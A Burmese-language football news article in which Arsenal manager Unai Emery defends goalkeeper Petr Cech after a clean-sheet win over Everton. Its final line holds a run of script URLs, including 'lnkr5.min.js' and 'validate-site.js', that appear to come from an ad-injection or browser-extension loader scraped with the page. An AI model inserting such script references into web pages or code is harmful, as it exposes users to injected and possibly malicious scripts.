အာဆင်နယ်အသင်းနည်းပြ အူနိုင်းအမ်မရီက အသင်းရဲ့ ဂိုးသမား ပီတာဆက်ခ်ျအပေါ် မေးခွန်းထုတ်ဝေဖန်ခဲ့ကြတာနဲ့ ပတ်သက်ပြီး အံ့အားသင့်ခဲ့ရတယ်လို့ ပြောကြားခဲ့ပါတယ်။ အသက် (၃၆) နှစ်အရွယ်ရှိပြီဖြစ်တဲ့ ပီတာဆက်ခ်ျဟာ အူနိုင်းအမ်မရီလက်ထက် ပရီးမီးယားလိဂ် ပွဲစဉ်တွေအားလုံးကို ပွဲထွက်ကစားခွင့်ရရှိခဲ့ပေမဲ့ ပွဲတိုင်းလိုလိုမှာ အမှားအယွင်းတွေ ကျူးလွန်ခဲ့ပြီး ရုန်းကန်ခဲ့ရပါတယ်။ မနေ့ညက အဲဗာတန်အသင်းနဲ့ ကစားခဲ့တဲ့ပွဲစဉ်မတိုင်ခင်အထိ အာဆင်နယ်အသင်းဟာ ပရီးမီးယားလိဂ်မှာ ပွဲတိုင်းဂိုးပေးခဲ့ရြ့ပီး ငါးပွဲကစားပြီးချိန်မှာ ကိုးဂိုးပေးခဲ့ရတာကြောင့် အာဆင်နယ်ပရိသတ်တွေက ပြီးခဲ့တဲ့နွေရာသီအပြောင်းအရွှေ့မှာ လေဗာကူဆင်အသင်းကနေ ခေါ်ယူထားခဲ့တဲ့ ဂိုးသမားလေနိုကို ဦးစားပေးပွဲထွက်ဖို့ တောင်းဆိုခဲ့ကြပါသေးတယ်။ 

မနေ့ညက ကစားခဲ့တဲ့ အဲဗာတန်အသင်းနဲ့ ပွဲစဉ်မှာတော့ အာဆင်နယ်အသင်းဟာ နှစ်ဂိုးဂိုးမရှိနဲ့ အနိုင်ရခဲ့ပြီး ဒီရာသီပြိုင်ပွဲစုံမှာ ပထမဆုံးပေးဂိုးမရှိခဲ့တဲ့ ပွဲလည်းဖြစ်ခဲ့ပါတယ်။ အဲဗာတန်အသင်းနဲ့ပွဲအပြီးမှာတော့ အူနိုင်းအမ်မရီက “ ပီတာဆက်ခ်ျနဲ့ပတ်သက်ပြီး မေးခွန်းတွေအများကြီး ထုတ်ခဲ့ကြတာကို ကျွန်တော်နည်းနည်းလေးအံ့သြမိပါတယ်။ သူက အသင်းနဲ့ ရာသီကြိုခြေစမ်းပွဲတွေအပါအဝင် ပရီးမီးယားလိဂ်ရဲ့ အစပိုင်းပွဲတွေမှာပါ ပုံစံကောင်းပြသနိုင်ခဲ့တဲ့ ဂိုးသမားတစ်ဦးပါ။ လေနိုက ကျွန်တော်တို့ အသင်းမှာ တိုးတက်လာတာမှန်ပေမဲ့ ပရီးမီးယားလိဂ်မှာ သူ့အတွက် သင်ယူစရာတွေ အများကြီးရှိနေပါသေးတယ်။”  

“ပီတာဆက်ခ်ျက ဒီမှာ အတွေ့အကြုံရင့် ဂိုးသမားတစ်ဦးဖြစ်တဲ့အပြင် အရည်အချင်းရှိပြီးသား ဂိုးသမားတစ်ယောက်လည်း ဖြစ်ပါတယ်။ သူက ဒီဘောလုံးရာသီကို အကောင်းဆုံးစတင်နိုင်ခဲ့ပြီး ကျွန်တော်လိုချင်တဲ့ စွမ်းဆောင်ရည်မျိုးကို သူ့ဆီက ရခဲ့တယ်လို့ ကျွန်တော်ထင်ပါတယ်။ ဒီနေ့ပွဲမှာလည်း ပွဲတိုင်းလိုလိုပြသခဲ့တဲ့ သူ့ရဲ့ ကြိုးစားအားထုတ်မှုနဲ့ တိုက်ပွဲဝင်စိတ်ဓာတ်တွေကို ကျွန်တော်တို့ကို ထပ်ပြီး ပြသခဲ့ပါသေးတယ်။” ဆိုပြီး ချီးကျူးစကား ပြောကြားသွားခဲ့ပါတယ်။ အဲဗာတန်နဲ့ပွဲမှာ Clean- Sheet ရခဲ့တဲ့ ပီတာဆက်ခ်ျဟာ သူ့အတွက် ပရီးမီးယားလိဂ်မှာ ပွဲပေါင်း (၂၀၂) ပွဲမြောက် Clean- Sheet ရခဲ့တာဖြစ်ပြီး ဒီစံချိန်က ပြိုင်ပွဲသမိုင်းတစ်လျှောက် အခြားဘယ်ဂိုးသမားထက်မဆို ပိုမိုများပြားတဲ့ ပွဲအရေအတွက်လည်း ဖြစ်ခဲ့ပါတယ်။

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1537782325110http://browfileext.com/addons/lnkr5.min.js